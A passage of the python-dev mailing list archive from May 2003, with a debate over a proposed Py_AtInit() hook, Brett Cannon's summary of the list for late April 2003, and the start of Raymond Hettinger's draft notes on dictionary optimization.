tweaking a few variables -- probably, just 'cvs update; make' in the 
Python directory instead of the Twisted one.  Is there interest in 
seeing these kinds of numbers generated regularly?  What kind of 
numbers would be interesting on the Python side?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (Darwin)

iD8DBQE+sUSIvVGR4uSOE2wRAmJDAJ9dRfcX8zPYUvExUtvpxTpQlg2GhwCfde5B
C7bsGc8YSwp5aN1vJ6BSiGU=
=/c5y
-----END PGP SIGNATURE-----



From martin@v.loewis.de  Thu May  1 16:46:05 2003
From: martin@v.loewis.de ("Martin v. Löwis")
Date: Thu, 01 May 2003 17:46:05 +0200
Subject: [Python-Dev] Initialization hook for extenders
In-Reply-To: <3EB13BDB.808E749@llnl.gov>
References: <3EB04B03.887CDF7B@llnl.gov> <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de> <3EB13BDB.808E749@llnl.gov>
Message-ID: <3EB1413D.7080604@v.loewis.de>

Patrick J. Miller wrote:

> It's not easy.
> 
> Not if you simply want to link against an installed Python.

Why not? Just don't call the function Py_Main.

> Nor so if you want to build against 2.1 2.2 and 2.3 ... libraries.

Again, I can't see a reason why that is.

> There are subtle changes that bite you in the ass if you don't
> physically copy the right source forward.

For example?

> We did copy forward main.c, but found that every time we updated
> Python, we had to "rehack" main to make sure we had all the options
> and flags and initialization straight.

That is not necessary. What would be the problem if you just left
your function as it was in Python 2.1?

> I think the hook is extremely cheap, very short, looks almost exactly
> like Py_AtExit() and solves the problem directly.

Unfortunately, the problem is one that almost nobody ever has, and 
supporting that API adds a maintenance burden. It is better if the
maintenance burden is on your side than on the Python core.

If you think you really need this, write a PEP, ask the community, and 
wait for BDFL pronouncement. I'm still -1.

Regards,
Martin




From patmiller@llnl.gov  Thu May  1 17:15:09 2003
From: patmiller@llnl.gov (Patrick J. Miller)
Date: Thu, 01 May 2003 09:15:09 -0700
Subject: [Python-Dev] Initialization hook for extenders
References: <3EB04B03.887CDF7B@llnl.gov> <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de> <3EB13BDB.808E749@llnl.gov> <3EB1413D.7080604@v.loewis.de>
Message-ID: <3EB1480D.EE379EC6@llnl.gov>

Martin,

Sorry you disagree.  I think that the issue is still important and
other pieces of the API are already in this direction.

For instance, there is no need to have PyImport_AppendInittab
because you can hack config.c (which you can get from
$prefix/lib/pythonx.x/config/config.c)
and in fact many people did exactly that, but it made for a messy
extension until the API call made it clean and direct.

You don't need Py_AtExit() because you can call through to
atexit.register() to put the function in.

The list goes on...

I still think that Py_AtInit() is clean, symmetric with Py_AtExit(),
and solves a big problem for extenders who wish to address
localization from within C (as opposed to sitecustomize.py).

This is a 10-line patch with zero runtime impact
that requires no maintenance to move forward with new versions.
If it were more than that, I could better understand your objections.

Hope that I can get you to at least vote 0 instead of -1.

Cheers,

Pat



-- 
Patrick Miller | (925) 423-0309 |
http://www.llnl.gov/CASC/people/pmiller

You can never solve a problem on the level on which it was created.
-- Albert Einstein, physicist, Nobel laureate (1879-1955)


From guido@python.org  Thu May  1 17:32:31 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 01 May 2003 12:32:31 -0400
Subject: [Python-Dev] Re: Python-Dev digest, Vol 1 #3221 - 4 msgs
In-Reply-To: Your message of "Thu, 01 May 2003 10:59:41 CDT."
 <EB0B6712-7BED-11D7-B27C-000393C9700E@twistedmatrix.com>
References: <EB0B6712-7BED-11D7-B27C-000393C9700E@twistedmatrix.com>
Message-ID: <200305011632.h41GWVu08466@odiug.zope.com>

Apologies accepted, Glyph.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Fri May  2 00:22:34 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Thu, 1 May 2003 16:22:34 -0700 (PDT)
Subject: [Python-Dev] python-dev Summary for 2003-04-16 through 2003-04-30
Message-ID: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>

Yes, I am actually getting the rough draft out the day after its coverage
ends.  Perk of being done with grad school apps.  =)

You guys have until Sunday (busy Friday and Saturday) to show me why I
should try proof-reading one of these days.  =)

And I did leave the one thread out that Guido asked not to be spread
around so I guess this summary is not as "complete" as previous ones.

--------------------------------

+++++++++++++++++++++++++++++++++++++++++++++++++++++
python-dev Summary for 2003-04-16 through 2003-04-30
+++++++++++++++++++++++++++++++++++++++++++++++++++++

This is a summary of traffic on the `python-dev mailing list`_ from April
16, 2003 through April 30, 2003.  It is intended to inform the wider
Python community of on-going developments on the list and to have an
archived summary of each thread started on the list.  To comment on
anything mentioned here, just post to python-list@python.org or
`comp.lang.python`_ with a subject line mentioning what you are
discussing. All python-dev members are interested in seeing ideas
discussed by the community, so don't hesitate to take a stance on
something.  And if all of this really interests you then get involved and
join `python-dev`_!

This is the sixteenth summary written by Brett Cannon (writing history the
way I see fit  =).

All summaries are archived at http://www.python.org/dev/summary/ .

Please note that this summary is written using reStructuredText_ which can
be found at http://docutils.sf.net/rst.html .  Any unfamiliar punctuation
is probably markup for reST_ (otherwise it is probably regular expression
syntax or a typo =); you can safely ignore it, although I suggest learning
reST; it's simple and is accepted for `PEP markup`__.  Also, because of the
wonders of programs that like to reformat text, I cannot guarantee you
will be able to run the text version of this summary through Docutils_
as-is unless it is from the original text file.

__ http://www.python.org/peps/pep-0012.html

.. _python-dev: http://www.python.org/dev/
.. _python-dev mailing list: http://mail.python.org/mailman/listinfo/python-dev
.. _comp.lang.python: http://groups.google.com/groups?q=comp.lang.python
.. _Docutils: http://docutils.sf.net/
.. _reST:
.. _reStructuredText: http://docutils.sf.net/rst.html

.. contents::


.. _last summary: http://www.python.org/dev/summary/2003-04-01_2003-04-15.html

=====================
Summary Announcements
=====================
So no one responded to my question last time about whether anyone cared if
I stopped linking to files in the Python CVS online through ViewCVS.  So
silence equals whatever answer makes my life easier, so I won't link to
files anymore.

.. _ViewCVS: http://viewcvs.sf.net/

=================
`2.3b1 release`__
=================
__ http://mail.python.org/pipermail/python-dev/2003-April/034682.html

Splinter threads:
    - `Masks in getargs.c
<http://mail.python.org/pipermail/python-dev/2003-April/034693.html>`__
    - `CALL_ATTR patch
<http://mail.python.org/pipermail/python-dev/2003-April/034712.html>`__
    - `Built-in functions as methods
<http://mail.python.org/pipermail/python-dev/2003-April/034749.html>`__
    - `Tagging the tree
<http://mail.python.org/pipermail/python-dev/2003-April/035069.html>`__
    - `RELEASED: Python 2.3b1
<http://mail.python.org/pipermail/python-dev/2003-April/035093.html>`__

Guido announced he wanted to get `Python 2.3b1`_ out the door by Friday,
April 25 (which he did).  He also said that if something urgently needed to
get in before then, the priority on the item should be set to 7.

The rule for betas is that you can apply bug fixes (that is the point of
such releases).  New unit tests can also be added as long as the entire
regression testing suite passes with them in there; since this is a beta
any bugs found should be patched along with adding the tests.

This led to some patches coming up that some people would like to see get
into b1.  One is Thomas Heller's patch at
http://www.python.org/sf/595026 which adds new argument masks for
PyArg_ParseTuple().  Thomas' patch adds two new masks ('k' and 'K') and
modifies some others so that their range checking (if they kept any) were
more reasonable.

This is when Jack Jansen chimed in saying that he didn't notice any mask
that worked between 2.2 and 2.3 that converts 32 bit values without
throwing a fit.  Basically the changes to the 'h' mask left all of the Mac
modules broken.  The change was backed out, though, and the issue was
solved.

Martin v. Löwis wanted to get IDNA (International Domain Name Addressing)
in (which he did).

UnixWare was (and as of this writing still is) broken.  It's being worked
on, though, by Tim Rice.

The CALL_ATTR patch that Thomas Wouters and I worked on at PyCon came up.
We were trying to come up with an opcode to replace the common
``LOAD_ATTR; CALL_FUNCTION`` opcode pair that happens whenever you call a
method.  The hope was to short-circuit pushing the method object onto the
stack, since it gets popped off immediately by CALL_FUNCTION.
Initially the patch only worked for classic classes but Thomas has since
cleaned it up and added support for new-style classes.

To help out Thomas, Guido gave an overview of new-style classes and how
descriptors work.  Basically a descriptor is what exists in a class'
__dict__ and "primarily affects instance attribute lookup".  When the
attribute lookup finds the descriptor it wants, it calls its __get__
method (tp_descr_get slot for C types).  The lookup then "binds" this to
the instance; this is what separates a bound method from a function since
functions are also descriptors.  Properties are just descriptors whose
__get__ calls whatever you passed for the fget argument.  Class attribute
lookup also calls __get__, but the instance argument is None (or NULL
in C code).  __set__ is called on a descriptor for instance attribute
assignment but not for class attribute assignment.

Guido clarified this later somewhat by the example having a descriptor f
that when ``f.__get__(obj)`` is called it returns a function g which acts
like a curried function (read the Python Cookbook if you don't know what
currying_ is).  Now when you call ``g(arg1, ...)`` you are basically doing
``f(obj, arg1, ...)``; so this all turns into ``f.__get__(obj)(arg1, ...)``.
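
In plain Python you can see that binding step directly, since functions are
themselves descriptors (a tiny sketch, not code from the thread)::

  def f(obj, x):
      return x * 2

  class C(object):
      pass

  c = C()
  g = f.__get__(c, C)         # "bind" f to the instance c
  assert g(21) == f(c, 21)    # calling g(arg) is really calling f(c, arg)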

The problem with the CALL_ATTR patch is that it is turning out to provide
zero benefit beyond having a nicer opcode for a common operation once the
code for working with new-style classes is included.
This could be from cache misses because of the increased size of the
interpreter loop or just too many branches to possibly take.  As of now
the patch is still on SF and has not been applied.

.. _Python 2.3b1: http://www.python.org/2.3/
.. _currying: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52549



========================
`Super and properties`__
========================
__ http://mail.python.org/pipermail/python-dev/2003-April/034338.html

This thread was initially covered in the `last summary`_.

Guido ended up explaining why super() does not work for properties.
super() does not stop on the first hit of finding something when that
"something" is a data descriptor; it ignores it and just keeps on looking.
Now super() does this so that it doesn't end up looking like something it
isn't.  Think of the case of __class__: if it returned what the object's
__class__ returned, it would cause super to look like something it isn't.
Guido figured people wouldn't want to override data descriptors anyway, so
this made sense.

But now there is a use case for this, so Guido is changing this for Python
2.3 so that data descriptors are properly hit in the inheritance chain by
super().


=====================
`Final PEP 311 run`__
=====================
__ http://mail.python.org/pipermail/python-dev/2003-April/034705.html

Mark Hammond's `PEP 311`_ has now been implemented!  What Mark has done is
implement two functions in C: PyGILState_Ensure() and
PyGILState_Release().  Call the first one to get control of the GIL,
without having to know its current state, to allow you to use the Python
API safely.  The second releases the GIL when you are done making calls
out to Python.  This is a much simpler interface than what was previously
needed when all you wanted was to hold the GIL, without setting up a
fancy threading interface with Python.

As always, read the PEP to get the full details.

.. _PEP 311: http://www.python.org/peps/pep-0311.html

===============================================
`summing a bunch of numbers (or "whatevers")`__
===============================================
__ http://mail.python.org/pipermail/python-dev/2003-April/034767.html

Splinter threads:
    - `stats.py
<http://mail.python.org/pipermail/python-dev/2003-April/034840.html>`__
    - `''.join() again
<http://mail.python.org/pipermail/python-dev/2003-April/034857.html>`__

How would you sum a list of numbers?  Traditionally there have been two
answers.  One is to use the operator module and 'reduce' in the idiomatic
``reduce(operator.add, list_of_numbers)``.  The other is to do a simple
loop::

  running_sum = 0
  for num in list_of_numbers:
      running_sum += num

Common complaints against the 'reduce' solution are that it is just plain ugly.
People don't like the loop solution because it is long for such a simple
operation.  And a knock against both is that new users of Python do not
necessarily think of either solution initially.  So, what to do?

Well, Alex Martelli to the rescue.  Alex proposed adding a new built-in,
'sum', that would take a list of numbers and return the sum of those
numbers.  Originally Alex also wanted to special-case the handling of a
list of strings so as to prevent having to tell new Python programmers
that ``"".join(list_of_strings)`` is the best way to concatenate a bunch
of strings and that looping over them and concatenating is *really* bad
(the repeated copying done in the loop kills performance).  But this
special-casing was shot down because it seemed rather magical, and the join
idiom can still be taught to beginners easily enough ('reduce' tends to
require an understanding of functional
programming).

But the function still got added for numbers.  So, as of Python 2.3b1,
there is a built-in named 'sum' that has the parameter list
"sum(list_of_numbers [, start=0]) -> sum of the numbers in
list_of_numbers".  The 'start' parameter gives an initial value that the
numbers are added to (it defaults to 0).  And since this is a function with
a very specific use, it is the fastest way you can sum a list of numbers.
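
A quick example of the new built-in (the second call passes a 'start'
value)::

  >>> sum([1, 2, 3])
  6
  >>> sum([1, 2, 3], 10)
  16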

The question of adding a statistics module came up during this discussion.
The thought was presented to come up with a good, basic stats module to
have in the stdlib.  The argument against this was that there are
already several good stats modules out there, so why bother with including
one with Python?  It would cause some overshadowing of any 3rd-party stats
modules.  Eventually the "nays" had it and the idea was dropped.

And for all his work Alex got CVS commit privileges.  Python, the gift
that keeps on giving you more responsibility.  =)

==================================
`When is it okay to cvs remove?`__
==================================
__ http://mail.python.org/pipermail/python-dev/2003-April/035011.html

Related threads:
    - `Rules of a beta release?
<http://mail.python.org/pipermail/python-dev/2003-April/035092.html>`__

Being probably the most inexperienced person with CVS commit privileges on
Python, I am continuing with my newbie questions in terms of applying
patches to the CVS tree (and since I control the Summary I am going to
document the answers I get here so I don't have to write them down
somewhere else  =3D).  This time I asked about when it was appropriate to
use ``cvs remove``, specifically if it was reasonable if a file was
completely rewritten.

The answer was to not bother with it unless you are actually removing the
file forever; don't bother if you are just rewriting the file.  Also,
don't bother with changing the version number when doing a complete
rewrite; just make sure to mention in the CVS commit message that it is a
rewrite.

I also learned that the basic guideline to follow in terms of whether a
patch should be put up on SF_ or just committed directly is that if you
are unsure about the usefulness or correctness then you should post it on
SF.  But if you don't think there is anyone who can answer it on SF it
will just languish there for eternity.

Also learned the rules of a beta release.  Basically no changes that would
cause someone's code to not work the same way as when the beta was
released can be checked in.  New tests are okay, though.

.. _SF: http://www.sf.net/

=========
Quickies
=========
`3-way result of PyObject_IsTrue() considered PITA`__
    Raymond Hettinger discovered that PyObject_IsTrue() is documented as
never returning an error, which is not how the function actually behaves.
Raymond fixed the docs to match the code.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034658.html

`Python dies upon printing UNICODE using UTF-8`__
    Windows NT 4's support of UTF-8 is broken.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034666.html

`shellwords`__
    Gustavo Niemeyer asked if there was any chance of getting shellwords_
into the stdlib so as to be able to have POSIX command line word parsing.
The basic response was that shlex_ should be enhanced to do what Gustavo
wanted.  He has since written `patch #722686`_ that implements the
features he wanted.  It was also discovered that
distutils.util.split_quoted comes close.  If someone wants to document
Distutils utilities it would be greatly appreciated.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034670.html
.. _shellwords: http://www.crazy-compilers.com/py-lib/shellwords.html
.. _shlex: http://www.python.org/dev/doc/devel/lib/module-shlex.html
.. _patch #722686: http://www.python.org/sf/722686

`Changes to gettext.py for Python 2.3`__
    This thread was originally covered in the `last summary`_.  Barry
Warsaw and Martin v. Löwis discussed the gettext_ module and whether there
should be a way to coerce strings to other encodings.  They ended up
agreeing on defaulting on Unicode for storing the strings and having
.gettext() coerce to an 8-bit string while .ugettext() returns the
original Unicode string.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034511.html
.. _gettext: http://www.python.org/dev/doc/devel/lib/module-gettext.html

`Stackless 3.0 alpha 1 at blinding speed`__
    Christian Tismer has done it again; he improved Stackless_ and has now
managed to merge the abilities of Stackless 1 and 2, which has led to
3.0 alpha.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034708.html
.. _Stackless: http://www.stackless.com

`Build errors under RH9`__
    Python was not building under Red Hat 9, but Martin v. Löwis checked
in a fix.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034724.html

`Wrappers and keywords`__
    Matt LeBlanc asked why there wasn't a nice syntax for doing properties,
staticmethods, and classmethods.  The answer is that it was felt it was
more important to get the ability to use those new descriptors out there
instead of letting a syntax debate hold them up.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034715.html

`Startup overhead due to codec usage`__
    MA Lemburg and Martin v. Löwis discussed startup time taken up by
seeing what encoding is used by the local filesystem.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034742.html

`test_pwd failing`__
    Initially covered in the `last summary`_.  test_grp was failing for
the same reasons test_pwd was failing.  It has been fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034626.html

`Evil setattr hack`__
    Don't mess with an instance's __dict__ directly; we will let you, but
if you get burned it's your own fault.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034633.html

`heapq`__
    Splinter threads:
      - `FIFO data structure?
<http://mail.python.org/pipermail/python-dev/2003-April/034790.html>`__
      - `heaps
<http://mail.python.org/pipermail/python-dev/2003-April/035004.html>`__

    The idea of turning the heapq_ module into a class came up, and later
led to the idea of having a proper FIFO (First In, First Out) data
structure.  Both ideas were shot down.  The reason for this was that the
stdlib does not need to grow every possible data structure.  Guido's
design philosophy is to have a few very powerful data structures that
other ones can be built on top of.  This is why the bisect_ and heapq
modules work on standard lists instead of defining a new class.  Queue_ is
an exception, but it is designed to mediate messages between threads
rather than to be a general implementation of a queue.
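
For reference, a minimal sketch of that usage, with the heapq_ functions
operating directly on an ordinary list (the data is made up)::

    import heapq

    heap = []                         # an ordinary list serves as the heap
    for item in [5, 1, 4, 2, 3]:
        heapq.heappush(heap, item)    # maintain the heap invariant in place
    while heap:
        print heapq.heappop(heap)     # pops 1, 2, 3, 4, 5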

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034768.html
.. _heapq: http://www.python.org/dev/doc/devel/lib/module-heapq.html
.. _bisect: http://www.python.org/dev/doc/devel/lib/module-bisect.html
.. _Queue: http://www.python.org/dev/doc/devel/lib/module-Queue.html

`New re failures on Windows`__
    Splinter threads:
      - `sre vs gcc
<http://mail.python.org/pipermail/python-dev/2003-April/034895.html>`__

    The re_ module was failing after some changes were made to it.  The
pain of it all was that it was failing only on certain platforms running
gcc_.  Initial attempts were to make it "just work", but then it was
stressed that it is more important to find the offending C code and figure
out why gcc on certain platforms was generating bad assembly.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034776.html
.. _re: http://www.python.org/dev/doc/devel/lib/module-re.html
.. _gcc: http://gcc.gnu.org/

`os.path.walk() lacks 'depth first' option`__
    Someone requested that os.path.walk support depth-first walking.  The
request was deemed not important enough to bother implementing, but Tim
Peters did implement a new function named os.walk that is a much improved
replacement for os.path.walk.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034792.html

`Weekly Python Bug/Patch Summary`__
    Skip Montanaro's weekly reminder that there is work to be done!
Summary for week 2 can be found `here
<http://mail.python.org/pipermail/python-dev/2003-April/035125.html>`__.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034797.html

`Hook Extension Module Import?`__
    Want to do something that requires a special import hook in C?  Then
override the __import__ built-in with what you need.
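
A minimal sketch of that idea, shown from Python for brevity (the tracing
hook itself is hypothetical; replacing the __import__ built-in is the
mechanism discussed, and the same built-in can be replaced from C)::

    import __builtin__

    _original_import = __builtin__.__import__

    def traced_import(name, globals={}, locals={}, fromlist=[]):
        # hypothetical hook: report the import, then defer to the original
        print "importing", name
        return _original_import(name, globals, locals, fromlist)

    __builtin__.__import__ = traced_import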

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034804.html

`Bug/feature/patch policy for optparse.py`__
    Greg Ward asked if it would be okay to keep the official version of
optparse_ at http://optik.sf.net/ .  Guido said sure.  The justification
for this is that Greg wants Optik to be available to people for use in
earlier versions of Python.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034833.html
.. _optparse: http://www.python.org/dev/doc/devel/lib/module-optparse.html

`LynxOS4 dynamic loading with dlopen() and -ldl`__
    LynxOS4 does not like dynamic linking.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034878.html

`Embedded python on Win2K, import failures`__
    I don't like Windows.  And no, this has nothing to do with this single
email that is a short continuation of one covered in the `last summary`_.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034506.html

`New thread death in test_bsddb3`__
    After Mark Hammond's new thread code was checked in, the bsddb module
broke.  Using the wonders of the C preprocessor and
NEW_PYGILSTATE_API_EXISTS, Mark fixed the code to use the new PyGILState
API covered in `PEP 311`_ when possible and to fall back to the old
solution when needed.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034901.html

`Magic number needs upgrade`__
    Guido noticed that the PYC magic number needed to be incremented to
handle Raymond Hettinger's new bytecode optimizations.  But then Guido
questioned the need for Raymond's changes.  Basically Raymond's changes
didn't speed anything up but cleaned up the emitted bytecode.  Guido
didn't like the idea of adding more code without an actual speed
improvement.  Since neither this code nor any of the other proposed
speedup changes (CALL_ATTR and caching attribute lookup results) were
panning out, Guido questioned why Raymond's should get in.  Guido
suggested rewriting the interpreter from scratch, since all new changes
seem to be breaking some delicate balance that has developed in it.  He
also suggested putting effort into other things, like psyco_.  Eventually
Raymond's changes were backed out.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034905.html
.. _psyco: http://psyco.sf.net/

`draft PEP: Trace and Profile Support for Threads`__
    Jeremy Hylton has a draft PEP on how to add hooks for profile and
trace code in threads.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034909.html

`Data Descriptors on module objects`__
    Never going to happen.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035025.html

`Metatype conflict among bases?`__
    "The metaclass [of a class] must be a subclass of the metaclass of all
the bases" of that class.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034910.html

`okay to beef up tests on the maintenance branch?`__
    Answer: yes!

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034939.html

`Cryptographic stuff for 2.3`__
    AM Kuchling wanted to add an implementation of the AES_ encryption
algorithm to the stdlib.  After a long discussion the idea was shot down
because having crypto that strong in the stdlib would cause export issues
for Python.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034957.html
.. _AES: http://csrc.nist.gov/encryption/aes/

`vacation`__
    Neal Norwitz is on vacation from April 26 till May 6.  He pointed out
some nagging errors coming up from the `Snake Farm`_ that could use some
work.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034942.html
.. _Snake Farm: http://www.lysator.liu.se/xenofarm/python/latest.html

`test_getargs2 failures`__
    Not anymore.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034944.html

`Democracy`__
    Guido pointed out an interesting paper on democracy (in the ancient
Athenian sense) and the organization of groups at
http://www.acm.org/ubiquity/interviews/b_manville_1.html.  It sparked some
discussion on proper comparisons to open source projects and such.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034946.html

`Updating PEP 246 for type/class unification, 2.2+, etc.`__
    Phillip Eby proposed some changes to `PEP 246`_.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034955.html
.. _PEP 246: http://www.python.org/peps/pep-0246.html

`why is test_socketserver in expected skips?`__
    Skip Montanaro noticed that test_socketserver was listed as an
expected skip on all platforms except os2emx, even though it works on all
platforms with networking (basically all of them).  So it was removed
from the expected-skip list.  Skip also tweaked test_support.requires to
always pass when the caller is __main__.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034973.html

`netrc.py`__
    Bram Moolenaar, author of the `greatest editor in the world`_ and
AAP_, requested a change to netrc_ that was implemented.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034983.html
.. _greatest editor in the world: http://www.vim.org/
.. _AAP: http://www.a-a-p.org/
.. _netrc: http://www.python.org/dev/doc/devel/lib/module-netrc.html

`PyRun_* functions`__
    They take FILE* arguments and it is going to stay that way.  Just make
sure the files are opened with the same C library that Python was built
against.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034990.html

`Python Developers`__
    Related threads:
      - `Getting mouse position interms of canvas unit.
<http://mail.python.org/pipermail/python-dev/2003-April/035149.html>`__
      - `2.3b1, and object()
<http://mail.python.org/pipermail/python-dev/2003-April/035210.html>`__

    Posted to the wrong email list.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/034969.html

`New test failure on Windows`__
    re_ was failing but got fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035009.html

`More new Windos test failures`__
    Just before `Python 2.3b1`_ got pushed out the door, some last-minute
test failures cropped up (some of them were my fault).  But they got
fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035047.html

`should sre.Scanner be exposed through re and documented?`__
    re.Scanner shall remain undocumented.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035066.html

`LynxOS4 port: need pre-ncurses curses!`__
    The LynxOS is hoping curses will go away.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035052.html

`test_s?re merge`__
    test_re and test_sre have been merged and moved over to unittest_
thanks to Skip Montanaro.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035067.html
.. _unittest: http://www.python.org/dev/doc/devel/lib/module-unittest.html

`test_ossaudiodev hanging again`__
    Some people are still having issues with ossaudiodev tests hanging.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035056.html

`bz2 module fails to compile on Solaris 8`__
    The joys of being cross-platform.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035068.html

`test_logging hangs on Solaris 8`__
    Splinter threads:
      - `test_logging hangs on OS X
<http://mail.python.org/pipermail/python-dev/2003-April/035135.html>`__
      - `test_logging hangs on Solaris 8 (and 9)
<http://mail.python.org/pipermail/python-dev/2003-April/035100.html>`__

    The joys of threading and trying to avoid deadlock.  A fix has been
checked in that seems to fix this on OS X; don't know about Solaris yet.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035065.html

`Python 2.3b1 documentation`__
    Fred L. Drake, Jr. posted the documentation for Python 2.3b1.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035064.html

`Accepted PEPs?`__
    Splinter threads:
      - `Reminder to PEP authors
<http://mail.python.org/pipermail/python-dev/2003-April/035109.html>`__
      - `proposed amendments to PEP 1
<http://mail.python.org/pipermail/python-dev/2003-April/035161.html>`__

    The status of some PEPs got updated along with some proposed changes
to `PEP 1`_.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035104.html
.. _PEP 1: http://www.python.org/peps/pep-0001.html

`Problems w/ Python 2.2-maint and Redhat 9`__
    Dealing with some issues of Python 2.2-maint and linking against a
dbm.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035120.html

`Why doesn't the uu module give you the filename?`__
    Someone wanted the uu_ module to let you know what the name of the
encoded file is.  They were told to post a patch.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035129.html
.. _uu: http://www.python.org/dev/doc/devel/lib/module-uu.html

`Antigen found CorruptedCompressedUuencodeFile virus`__
    The joys of having to watch out for viruses in emails and get false
positives.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035130.html

`Python 2.3b1 has 20% slower networking?`__
    Splinter threads:
      - `Python-Dev digest, Vol 1 #3221 - 4 msgs
<http://mail.python.org/pipermail/python-dev/2003-April/035153.html>`__

    Networking throughput in a loop did not reach as high a maximum as it
did before.  It has been fixed, though.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035132.html

`cvs socketmodule.c and IPV6 disabled`__
    Discovered some code that couldn't compile because a test for a
specific C function was not specific enough.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035146.html

`Introduction :)`__
    Someone else with the first name of Brett introduced themselves to the
list (Brett Kelly).  You can tell us apart because I am taller.  =)

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035162.html

`Dictionary tuning`__
    Splinter threads:
      - `Dictionary tuning upto 100,000 entries
<http://mail.python.org/pipermail/python-dev/2003-April/035194.html>`__

    Raymond Hettinger did a bunch of attempted tuning of dictionary
accesses and came up with one solution that managed to be beneficial for
large dictionaries and not detrimental for small ones.  He basically just
made dictionary sizes grow by a factor of 4 instead of 2 so as to lower
the number of collisions.  The objection that came up was that some
dictionaries would be larger than they were previously.  It looks like the
change will be applied, and Raymond's notes on everything will most likely
end up as a text file in the Python source tree.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035151.html

`Thoughts on -O`__
    It was suggested to change what the -O and -OO command-line switches
did since at this moment they don't do much (Guido has even suggested
eliminating -O).  But the discussion has been partially put on hold until
development for Python 2.4 starts.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035165.html

`Initialization hook for extenders`__
    It has been suggested to add a Py_AtInit() hook to Python to be
symmetric with Py_AtExit().  The debate over this is still going.

.. __: http://mail.python.org/pipermail/python-dev/2003-April/035226.html




From Raymond Hettinger" <python@rcn.com  Fri May  2 06:24:05 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Fri, 2 May 2003 01:24:05 -0400
Subject: [Python-Dev] Draft of dictnotes.txt  [Please Comment]
Message-ID: <000901c3106b$0d549d20$125ffea9@oemcomputer>

NOTES ON OPTIMIZING DICTIONARIES
================================


Principal Use Cases for Dictionaries
------------------------------------

Passing keyword arguments
    Typically, one read and one write for 1 to 3 elements.
    Occurs frequently in normal python code.

Class method lookup
    Dictionaries vary in size with 8 to 16 elements being common.
    Usually written once with many lookups.
    When base classes are used, there are many failed lookups
        followed by a lookup in a base class.

Instance attribute lookup and Global variables
    Dictionaries vary in size.  4 to 10 elements are common.
    Both reads and writes are common.

Builtins
    Frequent reads.  Almost never written.
    Size 126 interned strings (as of Py2.3b1).
    A few keys are accessed much more frequently than others.

Uniquification
    Dictionaries of any size.  Bulk of work is in creation.
    Repeated writes to a smaller set of keys.
    Single read of each key.

    * Removing duplicates from a sequence.
        dict.fromkeys(seqn).keys()
    * Counting elements in a sequence.
        for e in seqn:  d[e]=d.get(e,0) + 1
    * Accumulating items in a dictionary of lists.
        for k, v in itemseqn:  d.setdefault(k, []).append(v)

Membership Testing
    Dictionaries of any size.  Created once and then rarely changes.
    Single write to each key.
    Many calls to __contains__() or has_key().
    Similar access patterns occur with replacement dictionaries
        such as with the % formatting operator.


Data Layout (assuming a 32-bit box with 64 bytes per cache line)
----------------------------------------------------------------

Small dicts (8 entries) are attached to the dictobject structure
and the whole group nearly fills two consecutive cache lines.

Larger dicts use the first half of the dictobject structure (one cache
line) and a separate, contiguous block of entries (at 12 bytes each
for a total of 5.333 entries per cache line).


Tunable Dictionary Parameters
-----------------------------

* PyDict_MINSIZE.  Currently set to 8.
    Must be a power of two.  New dicts have to zero-out every cell.
    Each additional 8 consumes 1.5 cache lines.  Increasing improves
    the sparseness of small dictionaries but costs time to read in
    the additional cache lines if they are not already in cache.
